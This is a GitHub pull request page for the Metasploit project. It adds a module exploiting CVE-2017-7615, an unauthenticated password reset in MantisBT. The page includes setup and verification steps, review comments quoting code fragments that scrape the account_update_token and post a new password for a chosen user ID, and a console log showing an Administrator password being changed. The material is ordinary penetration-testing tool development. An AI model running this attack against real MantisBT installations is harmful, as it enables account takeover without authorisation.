Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add a module for CVE-2017-7615 #8671

Merged
merged 9 commits into from Jul 12, 2017
Merged

Add a module for CVE-2017-7615 #8671

merged 9 commits into from Jul 12, 2017

Conversation

@jvoisin
Copy link
Contributor

@jvoisin jvoisin commented Jul 9, 2017

Add a module for CVE-2017-7615, aka an unauthenticated password reset in MantisBT.

Verification

List the steps needed to make sure this thing works

  • Setup MantisBT (you can get the version 1.3.0 here or from sourceforge)
  • Start msfconsole
  • use auxiliary/admin/http/mantisbt_password_reset
  • set RHOST <target IP>
  • Verify that the module outputs [+] Password successfully changed to …
  • Verify that the password works
4. Do: ```set rhost```
5. Do: ```run```
6. If the system is vulnerable, the module should tell you that the password
was successfulyl changed.
Copy link
Contributor

@bcoles bcoles Jul 9, 2017

"successfully"

['CVE', '2017-7615'],
['EDB', '41890'],
['URL', 'https://mantisbt.org/bugs/view.php?id=22690']
['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
Copy link
Contributor

@bcoles bcoles Jul 9, 2017

Inconsistent indentation

],
'Platform' => ['win', 'linux'],
'Privileged' => false,
'DisclosureDate' => "Apr 16, 2017"))
Copy link
Contributor

@bcoles bcoles Jul 9, 2017

I don't think , is allowed in DisclosureDate.

Make sure you run tools/dev/msftidy.rb

Copy link
Contributor Author

@jvoisin jvoisin Jul 9, 2017

It doesn't raising any warnings here.

'vars_post' => {
'verify_user_id' => datastore['USERID'],
'account_update_token' => $1,
'realname' => 'jvoisin',
Copy link
Contributor

@bcoles bcoles Jul 9, 2017

Can the realname be randomized? Rex::Text.rand_text_alpha(rand(5) + 8)

Copy link
Contributor Author

@jvoisin jvoisin Jul 9, 2017

Sure

password = datastore['PASSWORD']
end

res.body =~ /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/
Copy link
Contributor

@bcoles bcoles Jul 9, 2017

Is this meant to be an if conditional?

Copy link
Contributor Author

@jvoisin jvoisin Jul 9, 2017

Nope, it's meant to get the token later, with $1.

Copy link
Contributor

@bcoles bcoles Jul 9, 2017

Will MantisBT accept the request if the account_update_token is '' ?

If not, it might be nice to handle this scenario, with something like:

if res.body =~ /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/
  token = $1
else
  fail_with(Failure::UnexpectedReply, 'Could not retrieve account_update_token')
end

Copy link
Contributor Author

@jvoisin jvoisin Jul 9, 2017

Sure

['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
],
'Platform' => ['win', 'linux'],
'Privileged' => false,
Copy link
Contributor

@bcoles bcoles Jul 9, 2017

Privileged can be removed for auxiliary modules.

if datastore['PASSWORD'].blank?
password = Rex::Text.rand_text_alpha(8)
else
password = datastore['PASSWORD']
Copy link
Contributor

@bcoles bcoles Jul 9, 2017

Does MantisBT make use of a password complexity policy? It might be nice to print_warning if the specified password is too weak to pass the complexity requirements.

Copy link
Contributor Author

@jvoisin jvoisin Jul 9, 2017

Absolutely not :D

@bcoles
Copy link
Contributor

@bcoles bcoles commented Jul 9, 2017

Thanks @jvoisin !

[
['CVE', '2017-7615'],
['EDB', '41890'],
['URL', 'https://mantisbt.org/bugs/view.php?id=22690']
Copy link
Contributor

@bcoles bcoles Jul 9, 2017

Missing comma , at end of line.

@pbarry-r7
Copy link
Contributor

@pbarry-r7 pbarry-r7 commented Jul 12, 2017

Verified, works as advertised for me (and did, indeed, change my Administrator account's password!):

$ ./msfconsole -q
msf > use auxiliary/admin/http/mantisbt_password_reset
msf auxiliary(mantisbt_password_reset) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf auxiliary(mantisbt_password_reset) > set TARGETURI mantisbt
TARGETURI => mantisbt
msf auxiliary(mantisbt_password_reset) > run

[+] Password successfully changed to 'KEYooXFe'.
[*] Auxiliary module execution completed

I have a few very minor style (and one spelling) tweak, will commit then land. Thanks, @jvoisin!

@pbarry-r7 pbarry-r7 merged commit 5802196 into rapid7:master Jul 12, 2017
1 check passed
@pbarry-r7
Copy link
Contributor

@pbarry-r7 pbarry-r7 commented Jul 12, 2017

Release Notes

The ability to reset the password associated with any user ID for vulnerable versions of MantisBT has been added.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

4 participants